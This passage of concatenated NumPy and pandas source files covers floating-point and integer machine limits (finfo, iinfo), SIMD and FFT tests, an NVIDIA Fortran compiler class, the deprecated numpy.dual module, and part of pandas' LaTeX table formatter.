_float_ma = {}
def _register_known_types():
# Known parameters for float16
# See docstring of MachAr class for description of parameters.
f16 = ntypes.float16
float16_ma = MachArLike(f16,
machep=-10,
negep=-11,
minexp=-14,
maxexp=16,
it=10,
iexp=5,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(f16(-10)),
epsneg=exp2(f16(-11)),
huge=f16(65504),
tiny=f16(2 ** -14))
_register_type(float16_ma, b'f\xae')
_float_ma[16] = float16_ma
# Known parameters for float32
f32 = ntypes.float32
float32_ma = MachArLike(f32,
machep=-23,
negep=-24,
minexp=-126,
maxexp=128,
it=23,
iexp=8,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(f32(-23)),
epsneg=exp2(f32(-24)),
huge=f32((1 - 2 ** -24) * 2**128),
tiny=exp2(f32(-126)))
_register_type(float32_ma, b'\xcd\xcc\xcc\xbd')
_float_ma[32] = float32_ma
# Known parameters for float64
f64 = ntypes.float64
epsneg_f64 = 2.0 ** -53.0
tiny_f64 = 2.0 ** -1022.0
float64_ma = MachArLike(f64,
machep=-52,
negep=-53,
minexp=-1022,
maxexp=1024,
it=52,
iexp=11,
ibeta=2,
irnd=5,
ngrd=0,
eps=2.0 ** -52.0,
epsneg=epsneg_f64,
huge=(1.0 - epsneg_f64) / tiny_f64 * f64(4),
tiny=tiny_f64)
_register_type(float64_ma, b'\x9a\x99\x99\x99\x99\x99\xb9\xbf')
_float_ma[64] = float64_ma
# Known parameters for IEEE 754 128-bit binary float
ld = ntypes.longdouble
epsneg_f128 = exp2(ld(-113))
tiny_f128 = exp2(ld(-16382))
# Ignore runtime error when this is not f128
with numeric.errstate(all='ignore'):
huge_f128 = (ld(1) - epsneg_f128) / tiny_f128 * ld(4)
float128_ma = MachArLike(ld,
machep=-112,
negep=-113,
minexp=-16382,
maxexp=16384,
it=112,
iexp=15,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-112)),
epsneg=epsneg_f128,
huge=huge_f128,
tiny=tiny_f128)
# IEEE 754 128-bit binary float
_register_type(float128_ma,
b'\x9a\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xfb\xbf')
_register_type(float128_ma,
b'\x9a\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xfb\xbf')
_float_ma[128] = float128_ma
# Known parameters for float80 (Intel 80-bit extended precision)
epsneg_f80 = exp2(ld(-64))
tiny_f80 = exp2(ld(-16382))
# Ignore runtime error when this is not f80
with numeric.errstate(all='ignore'):
huge_f80 = (ld(1) - epsneg_f80) / tiny_f80 * ld(4)
float80_ma = MachArLike(ld,
machep=-63,
negep=-64,
minexp=-16382,
maxexp=16384,
it=63,
iexp=15,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-63)),
epsneg=epsneg_f80,
huge=huge_f80,
tiny=tiny_f80)
# float80, first 10 bytes containing actual storage
_register_type(float80_ma, b'\xcd\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xfb\xbf')
_float_ma[80] = float80_ma
# Guessed / known parameters for double double; see:
# https://en.wikipedia.org/wiki/Quadruple-precision_floating-point_format#Double-double_arithmetic
# These numbers have the same exponent range as float64, but extended number of
# digits in the significand.
huge_dd = nextafter(ld(inf), ld(0), dtype=ld)
# As the smallest_normal in double double is so hard to calculate we set
# it to NaN.
smallest_normal_dd = NaN
# Leave the same value for the smallest subnormal as double
smallest_subnormal_dd = ld(nextafter(0., 1.))
float_dd_ma = MachArLike(ld,
machep=-105,
negep=-106,
minexp=-1022,
maxexp=1024,
it=105,
iexp=11,
ibeta=2,
irnd=5,
ngrd=0,
eps=exp2(ld(-105)),
epsneg=exp2(ld(-106)),
huge=huge_dd,
tiny=smallest_normal_dd,
smallest_subnormal=smallest_subnormal_dd)
# double double; low, high order (e.g. PPC 64)
_register_type(float_dd_ma,
b'\x9a\x99\x99\x99\x99\x99Y<\x9a\x99\x99\x99\x99\x99\xb9\xbf')
# double double; high, low order (e.g. PPC 64 le)
_register_type(float_dd_ma,
b'\x9a\x99\x99\x99\x99\x99\xb9\xbf\x9a\x99\x99\x99\x99\x99Y<')
_float_ma['dd'] = float_dd_ma
def _get_machar(ftype):
""" Get MachAr instance or MachAr-like instance
Get parameters for floating point type, by first trying signatures of
various known floating point types, then, if none match, attempting to
identify parameters by analysis.
Parameters
----------
ftype : class
Numpy floating point type class (e.g. ``np.float64``)
Returns
-------
ma_like : instance of :class:`MachAr` or :class:`MachArLike`
Object giving floating point parameters for `ftype`.
Warns
-----
UserWarning
If the binary signature of the float type is not in the dictionary of
known float types.
"""
params = _MACHAR_PARAMS.get(ftype)
if params is None:
raise ValueError(repr(ftype))
# Detect known / suspected types
key = ftype('-0.1').newbyteorder('<').tobytes()
ma_like = None
if ftype == ntypes.longdouble:
# Could be 80 bit == 10 byte extended precision, where last bytes can
# be random garbage.
# Comparing first 10 bytes to pattern first to avoid branching on the
# random garbage.
ma_like = _KNOWN_TYPES.get(key[:10])
if ma_like is None:
ma_like = _KNOWN_TYPES.get(key)
if ma_like is not None:
return ma_like
# Fall back to parameter discovery
warnings.warn(
'Signature {} for {} does not match any known type: '
'falling back to type probe function'.format(key, ftype),
UserWarning, stacklevel=2)
return _discovered_machar(ftype)
def _discovered_machar(ftype):
""" Create MachAr instance with found information on float types
"""
params = _MACHAR_PARAMS[ftype]
return MachAr(lambda v: array([v], ftype),
lambda v:_fr0(v.astype(params['itype']))[0],
lambda v:array(_fr0(v)[0], ftype),
lambda v: params['fmt'] % array(_fr0(v)[0], ftype),
params['title'])
@set_module('numpy')
class finfo:
"""
finfo(dtype)
Machine limits for floating point types.
Attributes
----------
bits : int
The number of bits occupied by the type.
eps : float
The difference between 1.0 and the next smallest representable float
larger than 1.0. For example, for 64-bit binary floats in the IEEE-754
standard, ``eps = 2**-52``, approximately 2.22e-16.
epsneg : float
The difference between 1.0 and the next smallest representable float
less than 1.0. For example, for 64-bit binary floats in the IEEE-754
standard, ``epsneg = 2**-53``, approximately 1.11e-16.
iexp : int
The number of bits in the exponent portion of the floating point
representation.
machar : MachAr
The object which calculated these parameters and holds more
detailed information.
.. deprecated:: 1.22
machep : int
The exponent that yields `eps`.
max : floating point number of the appropriate type
The largest representable number.
maxexp : int
The smallest positive power of the base (2) that causes overflow.
min : floating point number of the appropriate type
The smallest representable number, typically ``-max``.
minexp : int
The most negative power of the base (2) consistent with there
being no leading 0's in the mantissa.
negep : int
The exponent that yields `epsneg`.
nexp : int
The number of bits in the exponent including its sign and bias.
nmant : int
The number of bits in the mantissa.
precision : int
The approximate number of decimal digits to which this kind of
float is precise.
resolution : floating point number of the appropriate type
The approximate decimal resolution of this type, i.e.,
``10**-precision``.
tiny : float
An alias for `smallest_normal`, kept for backwards compatibility.
smallest_normal : float
The smallest positive floating point number with 1 as leading bit in
the mantissa following IEEE-754 (see Notes).
smallest_subnormal : float
The smallest positive floating point number with 0 as leading bit in
the mantissa following IEEE-754.
Parameters
----------
dtype : float, dtype, or instance
Kind of floating point data-type about which to get information.
See Also
--------
MachAr : The implementation of the tests that produce this information.
iinfo : The equivalent for integer data types.
spacing : The distance between a value and the nearest adjacent number
nextafter : The next floating point value after x1 towards x2
Notes
-----
For developers of NumPy: do not instantiate this at the module level.
The initial calculation of these parameters is expensive and negatively
impacts import times. These objects are cached, so calling ``finfo()``
repeatedly inside your functions is not a problem.
Note that ``smallest_normal`` is not actually the smallest positive
representable value in a NumPy floating point type. As in the IEEE-754
standard [1]_, NumPy floating point types make use of subnormal numbers to
fill the gap between 0 and ``smallest_normal``. However, subnormal numbers
may have significantly reduced precision [2]_.
References
----------
.. [1] IEEE Standard for Floating-Point Arithmetic, IEEE Std 754-2008,
pp.1-70, 2008, http://www.doi.org/10.1109/IEEESTD.2008.4610935
.. [2] Wikipedia, "Denormal Numbers",
https://en.wikipedia.org/wiki/Denormal_number
"""
_finfo_cache = {}
def __new__(cls, dtype):
try:
dtype = numeric.dtype(dtype)
except TypeError:
# In case a float instance was given
dtype = numeric.dtype(type(dtype))
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
dtypes = [dtype]
newdtype = numeric.obj2sctype(dtype)
if newdtype is not dtype:
dtypes.append(newdtype)
dtype = newdtype
if not issubclass(dtype, numeric.inexact):
raise ValueError("data type %r not inexact" % (dtype))
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
if not issubclass(dtype, numeric.floating):
newdtype = _convert_to_float[dtype]
if newdtype is not dtype:
dtypes.append(newdtype)
dtype = newdtype
obj = cls._finfo_cache.get(dtype, None)
if obj is not None:
return obj
obj = object.__new__(cls)._init(dtype)
for dt in dtypes:
cls._finfo_cache[dt] = obj
return obj
def _init(self, dtype):
self.dtype = numeric.dtype(dtype)
machar = _get_machar(dtype)
for word in ['precision', 'iexp',
'maxexp', 'minexp', 'negep',
'machep']:
setattr(self, word, getattr(machar, word))
for word in ['resolution', 'epsneg', 'smallest_subnormal']:
setattr(self, word, getattr(machar, word).flat[0])
self.bits = self.dtype.itemsize * 8
self.max = machar.huge.flat[0]
self.min = -self.max
self.eps = machar.eps.flat[0]
self.nexp = machar.iexp
self.nmant = machar.it
self._machar = machar
self._str_tiny = machar._str_xmin.strip()
self._str_max = machar._str_xmax.strip()
self._str_epsneg = machar._str_epsneg.strip()
self._str_eps = machar._str_eps.strip()
self._str_resolution = machar._str_resolution.strip()
self._str_smallest_normal = machar._str_smallest_normal.strip()
self._str_smallest_subnormal = machar._str_smallest_subnormal.strip()
return self
def __str__(self):
fmt = (
'Machine parameters for %(dtype)s\n'
'---------------------------------------------------------------\n'
'precision = %(precision)3s resolution = %(_str_resolution)s\n'
'machep = %(machep)6s eps = %(_str_eps)s\n'
'negep = %(negep)6s epsneg = %(_str_epsneg)s\n'
'minexp = %(minexp)6s tiny = %(_str_tiny)s\n'
'maxexp = %(maxexp)6s max = %(_str_max)s\n'
'nexp = %(nexp)6s min = -max\n'
'smallest_normal = %(_str_smallest_normal)s '
'smallest_subnormal = %(_str_smallest_subnormal)s\n'
'---------------------------------------------------------------\n'
)
return fmt % self.__dict__
def __repr__(self):
c = self.__class__.__name__
d = self.__dict__.copy()
d['klass'] = c
return (("%(klass)s(resolution=%(resolution)s, min=-%(_str_max)s,"
" max=%(_str_max)s, dtype=%(dtype)s)") % d)
@property
def smallest_normal(self):
"""Return the value for the smallest normal.
Returns
-------
smallest_normal : float
Value for the smallest normal.
Warns
-----
UserWarning
If the calculated value for the smallest normal is requested for
double-double.
"""
# This check is necessary because the value for smallest_normal is
# platform dependent for longdouble types.
if isnan(self._machar.smallest_normal.flat[0]):
warnings.warn(
'The value of smallest normal is undefined for double double',
UserWarning, stacklevel=2)
return self._machar.smallest_normal.flat[0]
@property
def tiny(self):
"""Return the value for tiny, alias of smallest_normal.
Returns
-------
tiny : float
Value for the smallest normal, alias of smallest_normal.
Warns
-----
UserWarning
If the calculated value for the smallest normal is requested for
double-double.
"""
return self.smallest_normal
@property
def machar(self):
"""The object which calculated these parameters and holds more
detailed information.
.. deprecated:: 1.22
"""
# Deprecated 2021-10-27, NumPy 1.22
warnings.warn(
"`finfo.machar` is deprecated (NumPy 1.22)",
DeprecationWarning, stacklevel=2,
)
return self._machar
@set_module('numpy')
class iinfo:
"""
iinfo(type)
Machine limits for integer types.
Attributes
----------
bits : int
The number of bits occupied by the type.
min : int
The smallest integer expressible by the type.
max : int
The largest integer expressible by the type.
Parameters
----------
int_type : integer type, dtype, or instance
The kind of integer data type to get information about.
See Also
--------
finfo : The equivalent for floating point data types.
Examples
--------
With types:
>>> ii16 = np.iinfo(np.int16)
>>> ii16.min
-32768
>>> ii16.max
32767
>>> ii32 = np.iinfo(np.int32)
>>> ii32.min
-2147483648
>>> ii32.max
2147483647
With instances:
>>> ii32 = np.iinfo(np.int32(10))
>>> ii32.min
-2147483648
>>> ii32.max
2147483647
"""
_min_vals = {}
_max_vals = {}
def __init__(self, int_type):
try:
self.dtype = numeric.dtype(int_type)
except TypeError:
self.dtype = numeric.dtype(type(int_type))
self.kind = self.dtype.kind
self.bits = self.dtype.itemsize * 8
self.key = "%s%d" % (self.kind, self.bits)
if self.kind not in 'iu':
raise ValueError("Invalid integer data type %r." % (self.kind,))
@property
def min(self):
"""Minimum value of given dtype."""
if self.kind == 'u':
return 0
else:
try:
val = iinfo._min_vals[self.key]
except KeyError:
val = int(-(1 << (self.bits-1)))
iinfo._min_vals[self.key] = val
return val
@property
def max(self):
"""Maximum value of given dtype."""
try:
val = iinfo._max_vals[self.key]
except KeyError:
if self.kind == 'u':
val = int((1 << self.bits) - 1)
else:
val = int((1 << (self.bits-1)) - 1)
iinfo._max_vals[self.key] = val
return val
def __str__(self):
"""String representation."""
fmt = (
'Machine parameters for %(dtype)s\n'
'---------------------------------------------------------------\n'
'min = %(min)s\n'
'max = %(max)s\n'
'---------------------------------------------------------------\n'
)
return fmt % {'dtype': self.dtype, 'min': self.min, 'max': self.max}
def __repr__(self):
return "%s(min=%s, max=%s, dtype=%s)" % (self.__class__.__name__,
self.min, self.max, self.dtype)
```
#### File: core/tests/test_simd_module.py
```python
import pytest
from numpy.core._simd import targets
"""
This testing unit only for checking the sanity of common functionality,
therefore all we need is just to take one submodule that represents any
of enabled SIMD extensions to run the test on it and the second submodule
required to run only one check related to the possibility of mixing
the data types among each submodule.
"""
npyvs = [npyv_mod for npyv_mod in targets.values() if npyv_mod and npyv_mod.simd]
npyv, npyv2 = (npyvs + [None, None])[:2]
unsigned_sfx = ["u8", "u16", "u32", "u64"]
signed_sfx = ["s8", "s16", "s32", "s64"]
fp_sfx = ["f32"]
if npyv and npyv.simd_f64:
fp_sfx.append("f64")
int_sfx = unsigned_sfx + signed_sfx
all_sfx = unsigned_sfx + int_sfx
@pytest.mark.skipif(not npyv, reason="could not find any SIMD extension with NPYV support")
class Test_SIMD_MODULE:
@pytest.mark.parametrize('sfx', all_sfx)
def test_num_lanes(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
vector = getattr(npyv, "setall_" + sfx)(1)
assert len(vector) == nlanes
@pytest.mark.parametrize('sfx', all_sfx)
def test_type_name(self, sfx):
vector = getattr(npyv, "setall_" + sfx)(1)
assert vector.__name__ == "npyv_" + sfx
def test_raises(self):
a, b = [npyv.setall_u32(1)]*2
for sfx in all_sfx:
vcb = lambda intrin: getattr(npyv, f"{intrin}_{sfx}")
pytest.raises(TypeError, vcb("add"), a)
pytest.raises(TypeError, vcb("add"), a, b, a)
pytest.raises(TypeError, vcb("setall"))
pytest.raises(TypeError, vcb("setall"), [1])
pytest.raises(TypeError, vcb("load"), 1)
pytest.raises(ValueError, vcb("load"), [1])
pytest.raises(ValueError, vcb("store"), [1], getattr(npyv, f"reinterpret_{sfx}_u32")(a))
@pytest.mark.skipif(not npyv2, reason=(
"could not find a second SIMD extension with NPYV support"
))
def test_nomix(self):
# mix among submodules isn't allowed
a = npyv.setall_u32(1)
a2 = npyv2.setall_u32(1)
pytest.raises(TypeError, npyv.add_u32, a2, a2)
pytest.raises(TypeError, npyv2.add_u32, a, a)
@pytest.mark.parametrize('sfx', unsigned_sfx)
def test_unsigned_overflow(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
maxu = (1 << int(sfx[1:])) - 1
maxu_72 = (1 << 72) - 1
lane = getattr(npyv, "setall_" + sfx)(maxu_72)[0]
assert lane == maxu
lanes = getattr(npyv, "load_" + sfx)([maxu_72] * nlanes)
assert lanes == [maxu] * nlanes
lane = getattr(npyv, "setall_" + sfx)(-1)[0]
assert lane == maxu
lanes = getattr(npyv, "load_" + sfx)([-1] * nlanes)
assert lanes == [maxu] * nlanes
@pytest.mark.parametrize('sfx', signed_sfx)
def test_signed_overflow(self, sfx):
nlanes = getattr(npyv, "nlanes_" + sfx)
maxs_72 = (1 << 71) - 1
lane = getattr(npyv, "setall_" + sfx)(maxs_72)[0]
assert lane == -1
lanes = getattr(npyv, "load_" + sfx)([maxs_72] * nlanes)
assert lanes == [-1] * nlanes
mins_72 = -1 << 71
lane = getattr(npyv, "setall_" + sfx)(mins_72)[0]
assert lane == 0
lanes = getattr(npyv, "load_" + sfx)([mins_72] * nlanes)
assert lanes == [0] * nlanes
def test_truncate_f32(self):
f32 = npyv.setall_f32(0.1)[0]
assert f32 != 0.1
assert round(f32, 1) == 0.1
def test_compare(self):
data_range = range(0, npyv.nlanes_u32)
vdata = npyv.load_u32(data_range)
assert vdata == list(data_range)
assert vdata == tuple(data_range)
for i in data_range:
assert vdata[i] == data_range[i]
```
#### File: distutils/fcompiler/nv.py
```python
from numpy.distutils.fcompiler import FCompiler
compilers = ['NVHPCFCompiler']
class NVHPCFCompiler(FCompiler):
""" NVIDIA High Performance Computing (HPC) SDK Fortran Compiler
https://developer.nvidia.com/hpc-sdk
Since august 2020 the NVIDIA HPC SDK includes the compilers formerly known as The Portland Group compilers,
https://www.pgroup.com/index.htm.
See also `numpy.distutils.fcompiler.pg`.
"""
compiler_type = 'nv'
description = 'NVIDIA HPC SDK'
version_pattern = r'\s*(nvfortran|(pg(f77|f90|fortran)) \(aka nvfortran\)) (?P<version>[\d.-]+).*'
executables = {
'version_cmd': ["<F90>", "-V"],
'compiler_f77': ["nvfortran"],
'compiler_fix': ["nvfortran", "-Mfixed"],
'compiler_f90': ["nvfortran"],
'linker_so': ["<F90>"],
'archiver': ["ar", "-cr"],
'ranlib': ["ranlib"]
}
pic_flags = ['-fpic']
module_dir_switch = '-module '
module_include_switch = '-I'
def get_flags(self):
opt = ['-Minform=inform', '-Mnosecond_underscore']
return self.pic_flags + opt
def get_flags_opt(self):
return ['-fast']
def get_flags_debug(self):
return ['-g']
def get_flags_linker_so(self):
return ["-shared", '-fpic']
def runtime_library_dir_option(self, dir):
return '-R%s' % dir
if __name__ == '__main__':
from distutils import log
log.set_verbosity(2)
from numpy.distutils import customized_fcompiler
print(customized_fcompiler(compiler='nv').get_version())
```
#### File: site-packages/numpy/dual.py
```python
import warnings
warnings.warn('The module numpy.dual is deprecated. Instead of using dual, '
'use the functions directly from numpy or scipy.',
category=DeprecationWarning,
stacklevel=2)
# This module should be used for functions both in numpy and scipy if
# you want to use the numpy version if available but the scipy version
# otherwise.
# Usage --- from numpy.dual import fft, inv
__all__ = ['fft', 'ifft', 'fftn', 'ifftn', 'fft2', 'ifft2',
'norm', 'inv', 'svd', 'solve', 'det', 'eig', 'eigvals',
'eigh', 'eigvalsh', 'lstsq', 'pinv', 'cholesky', 'i0']
import numpy.linalg as linpkg
import numpy.fft as fftpkg
from numpy.lib import i0
import sys
fft = fftpkg.fft
ifft = fftpkg.ifft
fftn = fftpkg.fftn
ifftn = fftpkg.ifftn
fft2 = fftpkg.fft2
ifft2 = fftpkg.ifft2
norm = linpkg.norm
inv = linpkg.inv
svd = linpkg.svd
solve = linpkg.solve
det = linpkg.det
eig = linpkg.eig
eigvals = linpkg.eigvals
eigh = linpkg.eigh
eigvalsh = linpkg.eigvalsh
lstsq = linpkg.lstsq
pinv = linpkg.pinv
cholesky = linpkg.cholesky
_restore_dict = {}
def register_func(name, func):
if name not in __all__:
raise ValueError("{} not a dual function.".format(name))
f = sys._getframe(0).f_globals
_restore_dict[name] = f[name]
f[name] = func
def restore_func(name):
if name not in __all__:
raise ValueError("{} not a dual function.".format(name))
try:
val = _restore_dict[name]
except KeyError:
return
else:
sys._getframe(0).f_globals[name] = val
def restore_all():
for name in _restore_dict.keys():
restore_func(name)
```
#### File: fft/tests/test_helper.py
```python
import numpy as np
from numpy.testing import assert_array_almost_equal
from numpy import fft, pi
class TestFFTShift:
def test_definition(self):
x = [0, 1, 2, 3, 4, -4, -3, -2, -1]
y = [-4, -3, -2, -1, 0, 1, 2, 3, 4]
assert_array_almost_equal(fft.fftshift(x), y)
assert_array_almost_equal(fft.ifftshift(y), x)
x = [0, 1, 2, 3, 4, -5, -4, -3, -2, -1]
y = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4]
assert_array_almost_equal(fft.fftshift(x), y)
assert_array_almost_equal(fft.ifftshift(y), x)
def test_inverse(self):
for n in [1, 4, 9, 100, 211]:
x = np.random.random((n,))
assert_array_almost_equal(fft.ifftshift(fft.fftshift(x)), x)
def test_axes_keyword(self):
freqs = [[0, 1, 2], [3, 4, -4], [-3, -2, -1]]
shifted = [[-1, -3, -2], [2, 0, 1], [-4, 3, 4]]
assert_array_almost_equal(fft.fftshift(freqs, axes=(0, 1)), shifted)
assert_array_almost_equal(fft.fftshift(freqs, axes=0),
fft.fftshift(freqs, axes=(0,)))
assert_array_almost_equal(fft.ifftshift(shifted, axes=(0, 1)), freqs)
assert_array_almost_equal(fft.ifftshift(shifted, axes=0),
fft.ifftshift(shifted, axes=(0,)))
assert_array_almost_equal(fft.fftshift(freqs), shifted)
assert_array_almost_equal(fft.ifftshift(shifted), freqs)
def test_uneven_dims(self):
""" Test 2D input, which has uneven dimension sizes """
freqs = [
[0, 1],
[2, 3],
[4, 5]
]
# shift in dimension 0
shift_dim0 = [
[4, 5],
[0, 1],
[2, 3]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=0), shift_dim0)
assert_array_almost_equal(fft.ifftshift(shift_dim0, axes=0), freqs)
assert_array_almost_equal(fft.fftshift(freqs, axes=(0,)), shift_dim0)
assert_array_almost_equal(fft.ifftshift(shift_dim0, axes=[0]), freqs)
# shift in dimension 1
shift_dim1 = [
[1, 0],
[3, 2],
[5, 4]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=1), shift_dim1)
assert_array_almost_equal(fft.ifftshift(shift_dim1, axes=1), freqs)
# shift in both dimensions
shift_dim_both = [
[5, 4],
[1, 0],
[3, 2]
]
assert_array_almost_equal(fft.fftshift(freqs, axes=(0, 1)), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=(0, 1)), freqs)
assert_array_almost_equal(fft.fftshift(freqs, axes=[0, 1]), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=[0, 1]), freqs)
# axes=None (default) shift in all dimensions
assert_array_almost_equal(fft.fftshift(freqs, axes=None), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both, axes=None), freqs)
assert_array_almost_equal(fft.fftshift(freqs), shift_dim_both)
assert_array_almost_equal(fft.ifftshift(shift_dim_both), freqs)
def test_equal_to_original(self):
""" Test that the new (>=v1.15) implementation (see #10073) is equal to the original (<=v1.14) """
from numpy.core import asarray, concatenate, arange, take
def original_fftshift(x, axes=None):
""" How fftshift was implemented in v1.14"""
tmp = asarray(x)
ndim = tmp.ndim
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, int):
axes = (axes,)
y = tmp
for k in axes:
n = tmp.shape[k]
p2 = (n + 1) // 2
mylist = concatenate((arange(p2, n), arange(p2)))
y = take(y, mylist, k)
return y
def original_ifftshift(x, axes=None):
""" How ifftshift was implemented in v1.14 """
tmp = asarray(x)
ndim = tmp.ndim
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, int):
axes = (axes,)
y = tmp
for k in axes:
n = tmp.shape[k]
p2 = n - (n + 1) // 2
mylist = concatenate((arange(p2, n), arange(p2)))
y = take(y, mylist, k)
return y
# create possible 2d array combinations and try all possible keywords
# compare output to original functions
for i in range(16):
for j in range(16):
for axes_keyword in [0, 1, None, (0,), (0, 1)]:
inp = np.random.rand(i, j)
assert_array_almost_equal(fft.fftshift(inp, axes_keyword),
original_fftshift(inp, axes_keyword))
assert_array_almost_equal(fft.ifftshift(inp, axes_keyword),
original_ifftshift(inp, axes_keyword))
class TestFFTFreq:
def test_definition(self):
x = [0, 1, 2, 3, 4, -4, -3, -2, -1]
assert_array_almost_equal(9*fft.fftfreq(9), x)
assert_array_almost_equal(9*pi*fft.fftfreq(9, pi), x)
x = [0, 1, 2, 3, 4, -5, -4, -3, -2, -1]
assert_array_almost_equal(10*fft.fftfreq(10), x)
assert_array_almost_equal(10*pi*fft.fftfreq(10, pi), x)
class TestRFFTFreq:
def test_definition(self):
x = [0, 1, 2, 3, 4]
assert_array_almost_equal(9*fft.rfftfreq(9), x)
assert_array_almost_equal(9*pi*fft.rfftfreq(9, pi), x)
x = [0, 1, 2, 3, 4, 5]
assert_array_almost_equal(10*fft.rfftfreq(10), x)
assert_array_almost_equal(10*pi*fft.rfftfreq(10, pi), x)
class TestIRFFTN:
def test_not_last_axis_success(self):
ar, ai = np.random.random((2, 16, 8, 32))
a = ar + 1j*ai
axes = (-2,)
# Should not raise error
fft.irfftn(a, axes=axes)
```
#### File: lib/tests/test_financial_expired.py
```python
import sys
import pytest
import numpy as np
@pytest.mark.skipif(sys.version_info[:2] < (3, 7),
reason="requires python 3.7 or higher")
def test_financial_expired():
match = 'NEP 32'
with pytest.warns(DeprecationWarning, match=match):
func = np.fv
with pytest.raises(RuntimeError, match=match):
func(1, 2, 3)
```
#### File: io/formats/latex.py
```python
from __future__ import annotations
from abc import (
ABC,
abstractmethod,
)
from typing import (
Iterator,
Sequence,
)
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: str | tuple[str, str] | None
) -> tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: list[list[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> list[list[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> list[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: list[str]) -> list[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: list[str], i: int) -> list[str]:
r"""
Check following rows, whether row should be a multirow
e.g.: becomes:
a & 0 & \multirow{2}{*}{a} & 0 &
& 1 & & 1 &
b & 0 & \cline{1-2}
b & 0 &
"""
